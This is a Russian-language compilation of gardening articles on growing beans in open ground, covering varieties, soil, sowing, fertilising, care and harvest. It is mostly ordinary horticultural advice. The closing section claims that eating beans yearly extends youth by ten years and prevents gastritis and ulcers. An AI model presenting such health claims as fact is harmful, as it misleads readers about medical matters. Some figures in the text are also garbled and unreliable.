3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Как выращивать фасоль в открытом грунте

Как вырастить фасоль на даче в открытом грунте

Фасоль. Выращивание. Секреты и советы

Фасоль обыкновенная — однолетнее травянистое овощное растение семейства бобовых.

Стебель травянистый, у кустовых форм высотой 25—40 см, у полувьющихся до 1,5 м, у вьющихся 2— 5 м. Корневая система хорошо развита, проникает на глубину до 1 м. На корнях фасоли обитают клубеньковые бактерии, фиксирующие азот и обогащающие им почву. Вегетационный период 75—130 дней, в зависимости от формы и сорта. Цветки белые, зеленовато-белые, розовые, кремовые, темно-розовые, фиолетовые. У сортов с более темными лепестками семена более темные. Плод — боб прямой или изогнутый, плоский или цилиндрический. Семена крупные, почковидные, разнообразной окраски. Масса 1000 семян 150—500 г. Всхожесть сохраняется от 4—5 до 8—10 лет.

На приусадебных участках выращивают также однолетние формы лимской фасоли, отличающейся укороченными широкими плодами, которые растрескиваются при созревании.

Фасоль вьющаяся (огненно-красная, многоцветковая) — многолетнее растение, но выращивают ее как однолетник, так как она зимой вымерзает. В умеренной зоне в начале или в конце сезона вегетации растения повреждаются заморозками.

Питательная ценность фасоли

В зависимости от строения боба сорта фасоли делят на лущильные — с грубым толстым пергаментным слоем и волокнами по краям, полусахарные — со слабым или поздно появляющимся пергаментным слоем и сахарные, или спаржевые, в которых пергаментный слой отсутствует. Наиболее ценными считаются сахарные сорта.

В пищу используют зрелые семена, а у сахарных сортов и недозрелые бобы с семенами.

Стручки и плоды овощной фасоли содержат сахарозу, органические и жирные кислоты, флавоноиды, кумарины, минеральные соли, аминокислоты, в том числе аргинин, обладающий антидиабетическим действием. Фасоль способствует усилению секреции желудочного сока и является важным диетическим продуктом для больных гастритами.

Для повышения питательной ценности требуется обеспечить хороший рост и накопление питательных веществ растений и предупредить заболевания грибными и бактериальными инфекциями. Часто рекомендуют применять бордосскую жидкость для борьбы с грибными болезнями растений, но это снижает диетическую ценность урожая. В борьбе с возбудителями инфекции важно подобрать устойчивые сорта и вовремя применить естественные методы защиты растений и природных антагонистов патогенных грибов (триходермин).

Для повышения содержания витамина С применяют обработку биологическим стимулятором пло- дообразования Гибберсиб или Завязь.

Выращивание фасоли

Биологические особенности фасоли

Фасоль — однолетнее растение короткого дня, требовательна к свету, особенно в первые фазы развития. Фасоль теплолюбива: семена прорастают при температуре +12. 15°С, всходы и взрослые растения чувствительны к заморозкам и погибают при 0°С, но плохо переносит жару, засуху, особенно в период цветения. Оптимальная температура для роста и развития +5. 30°С.

Для фасоли требуется умеренная влажность почвы и воздуха; при недостатке влаги ухудшается качество плодов, быстро образуется пергаментный слой. При избытке влаги растение плохо развивается, наблюдается массовое опадание завязей и цветков.

Сорта фасоли, устойчивые к антракнозу сорта, с описанием

Аришка (ВНИИССОК) — раннеспелый, кустовой, высотой 35 см. Бобы слабоизогнутые, узкие, на поперечном сечении сердцевидные, без пергаментного слоя и волокна, зеленые, длиной 10—12 см, шириной 0,9— 1,0 см, верхушка заостренная, с клювиком средней длины. Высота прикрепления нижних бобов 10—15 см. Масса 100 бобов 486—490 г. Вкус хороший и отличный. Семена белые. Масса 1000 семян 197—200 г. Урожайность бобов 1,0—1,4 кг/кв. м. Хорошо переносит засуху и пониженные температуры. Устойчив к антракнозу и бактериозу.

Галепка (АГРО-БЕСТ) — среднеранний, кустовой, высотой 50—55 см. Бобы прямые, на поперечном сечении эллиптические до яйцевидных, без пергаментного слоя и волокна, светло-желтые, длиной 12—14 см, шириной 1,0—1,2 см, плоские, верхушка заостренная до тупой с клювиком. Высота прикрепления нижних бобов 18—19 см. Масса 100 бобов 580 г. Вкус хороший и отличный. Семена белые. Масса 1000 семян 280 г. Урожайность бобов 1,9 кг/кв. м. Устойчив к антракнозу, вирусу обыкновенной мозаики фасоли и бактериозу.

Золушка (ВНИИССОК) — раннеспелый, кустовой, высотой 50—55 см. Бобы изогнутые, на поперечном сечении округлые, без пергаментного слоя и волокна, желтые, длиной 12—14 см, шириной 0,5—0,6 см, верхушка заостренная до тупой. Высота прикрепления нижних бобов 15—18 см. На одном растении формируется 35—56 бобов. Масса 100 бобов 500—520 г. Вкус хороший. Семена белые с сильным жилкованием. Масса 1000 семян 230—240 г. Урожайность бобов 1,7 кг/кв. м. Устойчив к антракнозу и бактериозу.

Креолка (ВНИИССОК) — среднеспелый, кустовой, высотой 45—50 см. Бобы прямые или слабоизогнутые, на поперечном сечении сердцевидные, светло- зеленые, длиной 12—13 см, шириной 0,7—0,8 см, верхушка тупая, с клювиком, пергаментный слой и волокно отсутствуют на ранних стадиях развития. Высота прикрепления нижних бобов 15—16 см. Масса 100 бобов 500 г. Вкус хороший. Семена серые, рубчик коричневый. Масса 1000 семян 250—260 г. Урожайность бобов 1,0—1,2 кг/кв. м. Вынослив к неблагоприятным погодным условиям. Устойчив к антракнозу и бактериозу.

Лика (ВНИИССОК) — среднеспелый, кустовой, высотой 35—40 см. Бобы прямые, на поперечном сечении округлые, без пергаментного слоя и волокна, зеленые, длиной 16—17 см, шириной 1,0 см, верхушка заостренная, с клювиком. Высота прикрепления нижних бобов 16—20 см. Масса 100 бобов 450—500 г. Вкус хороший. Семена охряные. Масса 1000 семян 290—300 г. Товарная урожайность бобов до 1,9 кг/кв. м. Хорошо переносит засуху и пониженные температуры. Устойчив к антракнозу и бактериозу.

Октава (НИИОЗГ, ГАВРИШ) — раннеспелый, кустовой, высотой 40 см. Бобы прямые, на поперечном сечении эллиптические, без пергаментного слоя и волокна, светло-желтые, длиной 17 см, шириной 1,4 см, верхушка тупая. Высота прикрепления нижних бобов 12 см. Масса 100 бобов 940 г. Вкус продукции хороший. Семена черные. Масса 1000 семян 600 г. Урожайность бобов 2,7—2,8 кг/кв. м. Устойчив к антракнозу и бактериозу.

Полька (АГРО-БЕСТ) — среднеранний, кустовой, высотой 45—50 см. Бобы прямые, на поперечном сечении сердцевидные, без пергаментного слоя и волокна, светло-желтые, длиной 12—14 см, шириной 0,8—1,1 см, верхушка заостренная, с клювиком. Высота прикрепления нижних бобов 18 см. Масса 100 бобов 520 г. Вкус хороший и отличный. Семена белые. Урожайность бобов 2,0 кг/кв. м. Устойчив к антракнозу, вирусу обыкновенной мозаики фасоли, бактериозу.

Протва (ВНИИССОК) — раннеспелый кустовой, высотой 35 см. Бобы слабоизогнутые, на поперечном сечении округлые, светло-зеленые, длиной 14,5 см, шириной 0,8 см, с коротким клювиком, пергаментный слой и волокно отсутствуют на ранних стадиях развития. Высота прикрепления нижних бобов 12,2—12,6 см. Масса 100 бобов 525—541 г. Вкус хороший. Семена черные. Масса 1000 семян 213—220 г. Урожайность бобов 1,1—1,7 кг/кв. м. Вынослив к воздушной и почвенной засухе, пониженному температурному режиму. Устойчив к антракнозу, бактериозу и вирусу обыкновенной мозаики фасоли.

Рашель (ВНИИССОК) — раннеспелый кустовой, высотой 40—50 см. Бобы прямые, на поперечном сечении эллиптические, без пергаментного слоя и волокна, зеленые, длиной 15—17 см, шириной 1,1—1,2 см, верхушка заостренная, с клювиком. Высота прикрепления нижних бобов 18—24 см. Масса 100 бобов 410— 590 г. Вкус хороший и отличный. Семена белые. Масса 1000 семян 246—248 г. Урожайность бобов 1,1 кг/кв. м. Хорошо переносит засуху, пониженные температуры и переувлажнение. Устойчив к антракнозу.

Фантазия (ВНИИССОК) — среднеспелый, кустовой, высотой 38—45 см. Бобы прямые, на поперечном сечении округлые, без пергаментного слоя и волокна, зеленые, длиной 15—16 см, шириной 1,0 см, верхушка тупая, с клювиком. Высота прикрепления нижних бобов 15—16 см. Масса 100 бобов 420—600 г. Вкус после кулинарной обработки хороший. Семена охрянобежевые. Масса 1000 семян 290—310 г. Урожайность бобов 1,4 кг/кв. м. Хорошо переносит засуху, пониженные температуры и переувлажнение. Устойчив к антракнозу и бактериозу.

Размещение и подготовка почвы для выращивание фасоли

Фасоль предпочитает легкие, хорошо прогреваемые почвы. Вьющуюся фасоль обычно выращивают на солнечном участке, защищенном от ветра, поскольку он может сильно повредить растения. Кустовая овощная фасоль также значительно повышает урожаи на участках, защищенных от холодных ветров. Хорошо размещать фасоль в междурядьях сада. На одном и том же места фасоль рекомендуется выращивать не чаще чем раз в четыре-пять лет.

Фасоль лучше всего сеять на хорошо дренированных почвах с достаточно высоким уровнем плодородия, нейтральной или слабокислой реакцией (рН = 6,0— 7,0). На переувлажненных землях крупные семена фасоли могут начать гнить, растения легко поражаются грибными заболеваниями.

На огороде овощную фасоль нужно сеять на 2—3-й год после внесения органических удобрений. Лучшими предшественниками для фасоли являются тыквенные, капустные, корнеплодные овощные культуры и ранний картофель.

Посев фасоли

Тщательная подготовка почвы — важное условие для мощного роста и обильного плодоношения. При традиционном способе подготовки почвы копают осенью на полный штык лопаты с внесением перегноя (100 кг на 10 кв. м) и суперфосфата (300—400 г на 10 кв. м). За 1—2 недели до посева на участок вносят полное минеральное удобрение (70—100 г нитрофоски на 1 кв. м). На огородных участках с высоким уровнем плодородия можно внести только фосфорные и калийные удобрения: на 1 кв. м 30 г суперфосфата, 20 г хлорида калия. Избыток азотных удобрений может вызвать излишний рост вегетативных органов и листьев. При необходимости почву перед посевом известкуют (3—4 кг извести на 1 кв. м).

Фасоль выращивают посевом семян на место, а в северной и частично в Центральной России -— рассадой. При рассадном способе растения выращивают в горшочках в теплицах или парниках без дополнительного обогрева (под пленкой) при температуре + 10. 15°С. Посев проводится примерно за четыре недели до предполагаемой высадки.

Семена перед посевом выдерживают в 1%-ном растворе марганцовки (10 г на 1 л волы), затем промывают в чистой воде и просушивают. Семена полезно заранее прорастить в теплом месте между слоями смоченной водой салфетки.

За несколько дней до высадки проводят закаливание рассады, приоткрывая парники или боковые стенки теплицы. До тех пор, пока угроза заморозков полностью не пройдет, рассаду высаживать в открытый грунт нельзя.

Прямой посев в открытый грунт начинают с учетом возможности защиты посевов от заморозков. С посевом весной торопиться не следует. Для нормального прорастания семян почва должна прогреться до + 10°С. Почву перед ранним посевом надо прогреть, укрыв ее за 3 недели до посева старой полиэтиленовой пленкой, присыпав ее края. Посев кустовых сортов в большинстве районов можно проводить в начале мая. Вьющиеся сорта фасоли высевают позже, вместе с другими теплолюбивыми культурами, — в конце мая — начале июня.

Кустовые сорта выращивают рядами с шириной междурядья 45 см. Семена высеваются через 5—8 см на глубину 2 см. Перед высевом бороздки поливают раствором Триходермина для борьбы с грибными инфекциями почвы. Так же высевают и вьющиеся сорта, но междурядья у них увеличивают до 60 см, а расстояния между растениями в ряду — до 10 см.

При ранних сроках посева растения в начале роста можно защищать от непогоды, пользуясь элементарными укрытиями. Укрытия расставляют за 3—4 недели до посева, в этом случае почва прогревается быстрее. В благоприятных условиях обычно прорастает 80% семян.

Уход за фасолью

Уход за посевами состоит в регулярном рыхлении почвы, прополках, поливах и подкормках по мере необходимости, борьбе с вредителями и болезнями. Рыхлить почву начинают при появлении всходов, в дальнейшем — по необходимости, после дождя, когда почва подсохнет и образуется легкая корка; одновременно пропалывают сорняки. За сезон это проделывают не менее 5—6 раз. При появлении первого настоящего листа всходы в загущенных местах прореживают.

Для поддержки вьющихся растений используют прутья, шесты, веревку, проволочную сетку или проволоку в виде шпалеры и т. д. Когда фасоль дорастет до вершины опоры, ее верхушку можно прищипнуть. В том случае, когда пользуются сеткой, ее натягивают с помощью проволоки на вертикальные опоры.

Участок периодически пропалывают, а в июне растения можно замульчировать торфом, соломой или покрыть черной полиэтиленовой пленкой.

В молодом возрасте, если фасоль плохо растет, ее подкармливают, внося на 1 кв. м 2—3 г аммиачной селитры, 2—3 г калийной соли и 4—9 г суперфосфата. В фазе бутонизации растения подкармливают минеральными удобрениями из расчета на 1 кв. м 15 г суперфосфата, 5 г хлорида калия.

Фасоль при цветении единичных растений и при массовом цветении дважды обрабатывают раствором гибберсиба (40—60 мл на 1 кв. м). Применение этого биопрепарата повышает урожай на 12—20%, увеличивает содержание Сахаров и витамина С. Для этой же цели можно применить биологический стимулятор плодообразования Завязь — раствором опрыскивают растения в начале плодообразования.

Когда всходы достаточно подрастут, полив, за исключением засушливых периодов, можно прекратить. Избыток влаги 6 начале роста способствует сильному разрастанию листьев в ущерб цветению и плодообразованию. Возобновляют поливы с началом цветения. Во время раскрытия цветков и образования бобов растения чрезвычайно болезненно реагируют на недостаток влаги. Именно в эти фазы их следует поливать особенно тщательно. Еженедельная поливная норма составляет 15—20 л воды на 1 кв. м. Закладка бобов, размеры и качество урожая при хорошем увлажнении заметно улучшаются.

Сбор урожая фасоли

Уборку овощной фасоли на лопатку начинают через 6—10 дней после образования завязей, когда бобы достигнут размеров 5—14 см и толщины 0,6—1,1 см. При этом створки бобов сочные, семена в бобе достигли величины пшеничного зерна, все пространство между створками заполнено мякотью, бобы легко ломаются. Собирают урожай в несколько сроков с интервалами 5—8 дней.

Для того чтобы растение долго плодоносило, следует своевременно снимать с него созревающие бобы. Карликовые кустовые сорта плодоносят сравнительно недолго, поэтому в условиях благоприятного климата возможны повторные посевы; вьющиеся же сорта образуют бобы на протяжении всего лета. Бобы срезают ножницами, пока они еще молодые и нежные. Перезрелые бобы становятся волокнистыми, их створки в тех местах, где внутри расположены семена, выпячиваются. При съеме плодов следите за тем, чтобы не повредить растения, для этого лучше не вырывать их, а срезать. При выращивании зрелых семян дожидаются полного созревания бобов, что сопровождается изменением их окраски.

В дождливую погоду можно собирать семена, когда бобы достигнут стадии восковой спелости. Растения выдергивают из почвы, связывают в пучки и ставят корнями вверх для просушки и дозревания на 8—10 дней. Для извлечения семян стручки лущат.

Правильная посадка и уход за фасолью в открытом грунте

Фасоль входит в топовую десятку самых полезных овощей, поэтому при выборе культур для выращивания на своём огороде ей всегда находится место. Чтобы потраченные время и средства были вознаграждены щедрым урожаем, необходимо ознакомиться с основными правилами агротехники, посадки и ухода при культивации в открытом грунте.

Когда можно сажать фасоль в открытом грунте

Высадку фасоли планируют на май месяц. Ориентироваться следует на погодные условия и правильный температурный режим в почве, который обозначен показателями 12-15 градусов (на глубине до 10 см). По народному календарю этот период совпадает с цветением каштанов.

Первыми нужно сажать прямостоячие сорта, а спустя неделю можно приниматься за вьющиеся разновидности. Кустовой вид бобовых планируют садить в начале июля. Это можно сделать на грядках, с которых уже собраны урожаи раннеспелых овощей.

Опытные садоводы выполняют посадочные работы в несколько этапов: с середины мая по начало июля с интервалом не менее 10 дней.

Кустовой сорт фасоли нужно сеять в грунт в начале июля

Боится ли фасоль заморозков

Фасоль теплолюбивая культура, поэтому высадку лучше делать весной во второй половине мая, когда минует угроза заморозков. Молодые побеги боятся даже холодных ветров, из-за чего многие огородники находят её место под яблонями или вдоль ограждения.

Минимальная температура, которую могут выдержать всходы фасоли, не превышает отметки -3-4 градуса. Если заморозки были непродолжительными, бобы выживут, но будет отмечаться замедленное их развитие и снижение урожайности.

Изменить ситуацию поможет агротекстиль либо плёнка, которые используются для сооружения временного укрытия.

Самые популярные сорта для посадки

Сортовое разнообразие усложняет выбор. Если возникают трудности при определении ассортимента, рекомендуется отдать предпочтение проверенным разновидностям, которые адаптированы под климат и погодные условия региона.

Лучшие сорта для Подмосковья, Украины и Беларуси

Московская белая зеленостручковая 556

Растение среднераннего срока вызревания, от посева до сбора урожая проходит 100 дней. Куст формируется в высоту всего 25 см, плоды имеют пергаментный слой, но очень тонкий. Культура неприхотливая, устойчивая к влажной среде и засухе.

Кочевник

Вьющийся сорт среднераннего созревания. Яйцевидный боб имеет охряной окрас с бледно-фиолетовым рисунком. Плод без пергаментной прослойки и волокон, что делает структуру нежной и мягкой. Растение толерантно к антракнозу, серой гнили.

Для Урала и средней полосы

Онар — раннеспелая зерновая фасоль со сроком вызревания 80-90 дней, рекомендованная чтобы посадить на даче в средней полосе России. Высота кустов от 35 до 56 см, плоды отличаются высокими вкусовыми качествами.

Розовая

Сбор урожая начинают через 65-85 дней после прорастания семян. Вьющийся куст достигает высоты до 3-х м, поэтому нуждается в опоре.

Мраморно-розовые бобы не содержат пергаментной прослойки и волокон, что придаёт им нежной структуры. На плодах виднеются фиолетовые разводы и штрихи. Применение универсальное, в каком-либо виде фасоль сохраняет неповторимый вкус.

Для Сибири

Победитель

Культура отличается высокой урожайностью и питательными качествами плодов. Длина стручков около 30 см, фасоль крупная. Холодостойкость и крепкий иммунитет дают возможность культивировать и вырастить растение в Сибири.

Особенность: плети с красивыми огненно-красными цветами могут использоваться в качестве декоративной изгороди.

Масляный король

Кустовой вид фасоли со сроком вызревания 1,5 месяца. Нежный и приятный вкус трубчатых плодов не оставит равнодушным ни одного гурмана. Длина стручковой части около 25 см. Применение урожая универсальное: заготовка в сухом виде, замораживание, консервирование.

Правила посадки и агротехника выращивания в открытом грунте

Подготовка семян

Вначале делают замачивание в слабом растворе марганцовки примерно на 20 минут. После процедуры фасоль промывают чистой водой и снова нужно замачивать в настое из древесной золы на 2 часа.

На ночь перед высевкой бобы гороха заворачиваются во влажную салфетку для проращивания в домашних условиях. А за 5 минут перед тем как сеять в почву их опускают в раствор борной кислоты. Это защитит растение от болезней и вредителей.

Подготовка почвы и выбор места для посева

Для высадки культуры выбирается хорошо освещённое место, но без сквозняков и сильного обдува ветрами, посадка через рассаду практически не используется. Тип почвы большой роли не играет, но опытными садоводами отмечено, что хуже всего фасоль развивается, может плохо прорастать и плодоносить на глинистых грунтах. Это объясняется плохой проходимостью влаги, из-за чего семена и корешки подгнивают.

В целом подготовительный процесс формирования грядки заключается в перекапывании грунта на глубину штыка лопаты. Одновременно вводят удобрения: на 1 м2 добавляют по 4 кг перегноя или компоста, 2 ст. л. доломитовой муки, 1 ст. л. аммиачной селитры и 2 ст. л. суперфосфата.

При подготовке грунта нужно перекопать его на глубину штыка лопаты

Другой вариант обогащения почвы питательными веществами предусматривает использование ½ компоста (перегноя), 30 гр. суперфосфата, 20 гр. древесной золы из расчёта на 1 м2.

При определении места для высадки фасоли во внимание принимают те культуры, которые выращивались на нём в прошлом сезоне.

Схема и глубина посадки

Кустовые разновидности культуры высаживают по схеме:

  • глубина закладки семян – где-то 5-6 см;
  • расстояние между лунками в ряду – 20-25 см;
  • междурядье – 40 см.

Вьющиеся сорта высаживаются несколько иначе:

  • глубина закладки семян – 5-6 см;
  • интервал между лунками в ряду – 25-30 см;
  • междурядье – 45-50 см.

При посадке фасоли в каждую лунку погружают 5-6 семян

В каждую лунку погружают по 5-6 семян. После формирования на всходах по одному листочку нужно оставить только 3 сеянца, остальные удалить либо аккуратно пересадить.

Согласно лунному календарю на 2018 год высаживать фасоль рекомендуется:

  • март – 20-23 числа;
  • апрель – 6-9, 19, 20, 23-26 числа;
  • май – 7-10, 19-24 числа;
  • июнь – 4-7 числа.

Уход после высадки

Неприхотливая фасоль не требует к себе большого внимания, но в основных правилах агротехники она всё же нуждается.

Проращивание семян фасоли

Семена фасоли начинают всходить спустя 7-10 дней после высадки. Если температура воздуха и почвы ниже рекомендуемых показателей, то первые ростки прорастут спустя на 5-7 дней.

Ускорить процесс прорастания можно если замочить посевной материал в стимуляторах роста дома. Также этому способствует укрытие грядки плёнкой.

Молодые побеги необходимо окучить для придания им устойчивости.

Правила и условия полива

Растение любит воду, поэтому нарушать поливочный режим не стоит. Особенно важно увлажнять почву в период формирования стручков.

Норма воды на куст определяется на глаз, процедуры проводить 1 раз в неделю, главное не давать грунту пересыхать. Самой лучшей жидкостью для орошения считаются осадки в виде дождя. Опытные садоводы используют отстоявшуюся воду, температура которой не ниже 18 градусов.

Фасоль любит воду, поэтому нельзя допускать пересыхания грунта

Какие подкормки использовать на грядке

Культура отзывчива на удобрения. После подготовки почвы к посадке потребуется внести не менее 3-х подкормок.

Первая процедура выполняется спустя 3-4 недели после появления всходов. Идеально воспользоваться комплексным удобрением, богатым азотом и фосфором. Также подойдёт суперфосфат из расчёта 30-40 грамм на 1 м2.

Через 3 недели нужно подкормить второй раз, это необходимо для формирования плодов (10-15 гр. калийной соли на 1 м2). Третий раз питательные вещества вводят спустя 3 недели.

Вредители и профилактика

Фасоль одна из немногих культур, которую не атакуют вредители. Могут появиться разве что слизни.

Предотвратить их нашествие можно своевременной прополкой, так как сорняки растут и создают для паразитов благоприятную среду обитания. При обнаружении слизней можно установить несколько ловушек, из которых нужно периодически извлекать насекомых с целью утилизации.

Правильные сроки сбора урожая на даче или огороде

Сроки сбора урожая зависят о сорта и виды культуры. Спаржевую фасоль не стоит передерживать на грядках, в подсушенном виде продукт теряет свою ценность.

Если планируется консервация урожая бобовых, то можно использовать сколько-либо недозрелые плоды. А вот для зимних заготовок лучше дождаться высыхания стручков. Главное не опоздать, чтоб не собирать потом фасолинки с земли.

Не стоит срывать все стручки одновременно в один день, если среди них имеются полностью сухие и зеленоватые. В тени собственной ботвы некоторые завязи могли слабее развиваться, их лучше оставить дозревать.

Чтобы быстро извлечь бобы из своих «домиков» вовсе не обязательно перебирать каждый вручную. С работой справится палка, которой можно выбить собранный урожай.

Для этого на покрывало выкладываются исключительно высушенные стручки, по которым с умеренным усилием нужно пройтись нехитрым инструментом. Останется только удалить сухую часть от бобов. Отобранная фасоль ещё проходит просушку и только после сортировки отправляется на хранение.

Агротехника фасоли несложная, посеять и выращивать ее в Подмосковье, на Украине, Урале или Беларуси сможет даже начинающий садовод. Выполняя своевременно все процедуры, обеспечиваются заготовки на зиму невероятно полезным и питательным продуктом, который к тому же разнообразит меню.

Выращивание фасоли в открытом грунте

Фасоль – бобовое растение с плодами в виде стручков, внутри которых находятся бобы.

Эти растения бывают вьющимися или имеют форму полукустарника. Расцветка и размеры фасолин зависят от сорта.
Чрезвычайная неприхотливость делает выращивание фасоли в открытом грунте доступным занятием даже для начинающего огородника.

Подготовка почвы и семян

Поскольку фасоль является тепло- и светолюбивой культурой, ее семена высевают в грунт не раньше конца мая (одновременно с огурцами), когда уже нет риска появления заморозков. Наилучший урожай можно собрать на легкой качественной почве с хорошим дренажем. И грунт, и семена нужно правильно подготовить перед посадкой.

Подготовка участка под фасоль

За 2-3 дня перед посадкой семян землю следует перекопать и взбороновать граблями, чтобы она стала рассыпчатой. Слишком вязкий грунт нужно облегчить песком – полведра на каждый квадратный метр.

При необходимости почву подкармливают путем внесения в нее древесной золы, компоста, биогумуса или перепревшего навоза. Подкормленную и перекопанную землю дезинфицируют слабым теплым раствором марганцовки.

Подготовка семян

Сначала необходимо перебрать бобы и удалить испорченные. Поскольку семена фасоли не требуют проращивания, непосредственно перед посадкой их заливают горячей (70°С) водой и выдерживают не более 10 минут. Это позволит фасолинам немного набухнуть и напитаться влагой, что приведет к быстрому появлению всходов. Некоторые огородники предпочитают замачивать фасоль на ночь, что равноценно их запариванию.

После любой из этих процедур семена дезинфицируют в аналогичном растворе марганцовки или борной кислоты. Это защитит будущие всходы от вредителей.

Посадка фасоли

Как и любая агротехника, выращивание фасоли в открытом грунте начинается с ее посадки. Высев фасоли может выполняться двумя способами – мокрым и сухим.
В первом случае технологический процесс выглядит следующим образом:

  • на участке делают 5-сантиметровые углубления (ямки или бороздки);
  • заливают их теплой водой;
  • насыпают на дно немного компоста;
  • укладывают семена с промежутком 15-20 см;
  • сверху засыпают грунтом;
  • покрывают слоем опилок (0,5 см).

Участок поливают теплой водой и накрывают пленкой, которую на день обязательно снимают для проветривания. С появлением всходов пленку снимают.
Сухой метод предполагает такую же агротехнику, но фасолины высаживаются в сухую землю.

После засыпки углублений грунтом весь участок покрывается травяной мульчей слоем в 10-12 см и поливается большим (5-7 л на лунку) количеством воды из лейки с ситечком. Слой мульчи наряду с распылением воды минимизирует разрушение структуры почвы, предотвращает ее заплывание и чрезмерное уплотнение, а также создает благоприятный микроклимат для семян.
Когда начинают появляться всходы, мульча аккуратно снимается и сразу проводится рыхление земли.

Для вьющихся сортов вдоль каждого ряда необходимо установить опоры. Лучше всего подходят 2-метровые деревянные рейки, которые вкапываются под наклоном. По ним и будут плестись будущие побеги, формируя мощные кусты.

Для придания устойчивости всходы окучивают, а при угрозе заморозков – накрывают пленкой или другим подходящим материалом. Чтобы обеспечить своевременное вызревание плодов, вьющиеся плети следует прищипнуть при достижении ими длины 2 м.

Уход за фасолью

Даже для такого неприхотливого растения, как фасоль, выращивание сопряжено с постоянным, хоть и несложным уходом. Он заключается в регулярном рыхлении, поливе, подкормке, удалении сорняков и вредителей. С помощью мульчирования можно значительно уменьшить потребность в поливах и прополках.

Рыхление почвы

Заниматься рыхлением почвы надо сразу же после появления всходов. Главное при этом – осторожность. Очень важно не вырвать росток и не повредить его корни. Когда фасоль подрастет, рыхление междурядий можно совмещать с прополкой.

Подкормка

Первый раз фасоль подкармливают примерно в месячном возрасте. Для этого используют комплексное минеральное удобрение (40 г на квадратный метр). Эту процедуру проводят вместе с рыхлением, смешивая удобрение с почвой. Чтобы восполнить недостаток азота, который возникает у фасоли при засушливой погоде, можно подкормить ее переброженным птичьим пометом.
Второй раз удобрения вносятся через 20 дней. На этом сроке они нужны для формирования бобов, которые больше всего нуждаются в фосфоре, магнии, калии (этот набор содержит древесная зола).

Полив

Грамотное выращивание фасоли в открытом грунте предполагает обильный полив, поскольку бобовые очень любят воду, особенно в период формирования стручков. Земля все время должна быть слегка влажной, при этом норма полива определяется климатическими условиями и составом грунта.
До цветения фасоль рекомендуется поливать каждые 7 дней, используя 5-6 л на квадратный метр. В период цветения и образования стручков это количество удваивают.

Лучше всего поливать дождевой водой по междурядьям. Следует избегать попадания капель на растение во избежание развития грибковых заболеваний. Поливы необходимо производить утром, чтобы к концу дня земля успела высохнуть.

Борьба с болезнями и вредителями

Чаще всего фасоль поражается антракнозом и ложной мучнистой росой. Также врагами культуры являются слизни. Развитию болезней препятствует соблюдение севооборота, сжигание остатков зараженных растений, известкование кислых грунтов, обеззараживание семян. От грибковых и вирусных заражений эффективны препараты меди.
Для предупреждения появления слизней следует вовремя уничтожать сорняки, соблюдать влажность почвы. При их появлении лучший способ борьбы – регулярное удаление.

Чтобы получить хорошую фасоль, посадка и уход должны быть сопряжены с высокой опыляемостью ее цветков. Для этого на грядке необходимо присутствие насекомых-опылителей. Хорошей приманкой будет сахарный сироп или раствор борной кислоты, которым следует регулярно опрыскивать цветущую фасоль. Также можно расставить емкости с разведенным в воде медом.

В период цветения не рекомендуется опрыскивать сады и огороды ядохимикатами, чтобы избежать гибели насекомых.

Сбор урожая

Первый урожай бобов (лопаток) можно собирать уже спустя две-три недели от цветения.
При этом следует ориентироваться на сорт фасоли и ее дальнейшее применение. С кустовых сортов можно снимать все стручки сразу. На вьющейся фасоли они зреют неравномерно, поэтому их срывают по мере поспевания.
Спаржевая фасоль теряет свою ценность при высыхании, поскольку ее принято употреблять зеленой вместе со стручками. Ее снимают недозрелой.

Бобы, предназначенные для хранения на зиму, собирают после того, как они станут желтыми, а фасоль для консервации срывают несколько раньше.

Если выращивание фасоли в открытом грунте производится массовым способом, ее нередко собирают всю сразу.

При этом оптимальным вариантом является сбор урожая, когда стручки становятся зрелыми, но еще остаются зелеными и не совсем высохшими. Для проверки зрелости их разламывают пополам – на разломе не должно быть волокон.

Сорта и виды фасоли

На сегодняшний день известно более полусотни видов фасоли. Она обладает высокими вкусовыми и питательными качествами, а также имеет целебное действие. Благодаря таким характеристикам это растение пользуется большой популярностью во всем мире.
Самой распространенной является белая и красная фасоль. Кроме того, есть зеленая, желтая, фиолетовая. Вся она различается по форме и размерам.

Также существуют кустовые и вьющиеся сорта.

Все разновидности фасоли подразделяются на три группы:
1- лущильные
2- полусахарные
3- сахарные.
Лущильные (зерновые) сорта дают только зерна, поскольку их створки имеют пергаментный слой, непригодный для употребления. В средней полосе России такая фасоль не выращивается, так как не успевает дозревать, а в недозрелом состоянии использованию не подлежит.
Полусахарные виды фасоли обладают слабым или поздно развивающимся пергаментным слоем, а также имеют грубые волокна, которые следует удалять перед употреблением.
Сахарные (спаржевые) фасоли без пергаментного слоя и в большинстве своем без жестких волокон считаются самыми лучшими. В такой фасоли много белков и витаминов.
По срокам созревания фасоль бывает:

  • раннеспелой (вызревает за 65 суток)
  • среднеранней (65-75)
  • средней (75-85)
  • среднеспелой (85-100)
  • поздней (более 100 суток).

Чтобы на протяжении сезона на столе всегда была стручковая фасоль, выращивание надо проводить равномерно, используя разные сорта и несколько сроков посева. Для получения большого урожая фасоли на маленькой грядке, лучше отдать предпочтение вьющейся. Кустовые сорта занимают больше места, но их удобнее выращивать, они не требуют подпорок, являются более стойкими и скороспелыми.

В целом фасоль – идеальная культура для выращивания на своем участке. Как продукт она очень полезна и даже целебна. Как растение – не требует особых условий и специального ухода. Поэтому заниматься фасолью не просто целесообразно, но и очень приятно.

Садоводам
и огородникам

Как вырастить фасоль на своем огороде

К сожалению, не каждый садовод выращивает фасоль на своем участке. А напрасно. Ведь это – очень ценная белковая бобовая культур. Включая ее ежегодно в свой летний рацион, вы продлите молодость как минимум на 10 лет и обезопасите себя от таких желудочных заболеваний, как гастрит и язва.

Существует несколько разновидностей съедобной фасоли. Но на приусадебных участках, как правило, выращивают овощную и стручковую, которую употребляют в пищу вместе с лопатками.

Фасоль не требует тщательного ухода. Она прекрасно растет в большинстве регионов нашей страны и дает хорошие урожаи. Однако есть некоторые особенности, которые необходимо знать при ее выращивании.

В этой статье мы расскажем, как вырастить фасоль на своем участке и подскажем, какие сорта для этого лучше выбрать.

ОТКУДА ПОЯВИЛАСЬ ФАСОЛЬ

Фасоль с древнейших времен выращивалась в Центральной и Южной Америке, а также в Египте, Индии и Китае. В рационе американских индейцев она была так же популярна, как и картофель.

В Древнем Египте ее считали главным источником растительного белка. В Древней Греции бобы фасоли использовали не только как питательный продукт, но и как ценное лекарственное средство, понижающее сахар в крови и излечивающее тяжелые болезни желудка и поджелудочной железы.

Греки называли ее «лобос». И именно от них она попала на Кавказ. Об этом свидетельствует название одного из самых популярных в Грузии блюд из фасоли – «Лобио».

